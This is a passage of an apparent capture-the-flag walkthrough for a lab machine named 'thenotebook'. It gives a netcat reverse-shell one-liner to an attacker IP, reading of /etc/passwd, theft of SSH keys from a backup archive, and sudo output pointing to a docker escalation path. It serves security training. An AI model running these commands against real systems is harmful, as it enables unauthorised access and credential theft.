4 shell
There is some AV / firewall that is deleting the php shell evertime
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
noah:x:1000:1000:Noah:/home/noah:/bin/bash
As shell is dying out and .php file is being deleted Setting up a stable bash connection using
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.2 443 >/tmp/f
Enumerating I find home.tar.gz in /var/backups
cp home.tar.gz /tmp
tar -xf home.tar.gz
=> We find .ssh keys
$ chmod 600 id_rsa
$ ssh -i id_rsa noah@10.10.10.230
noah@thenotebook:~$ whoami;id
noah
uid=1000(noah) gid=1000(noah) groups=1000(noah)
noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
Last updated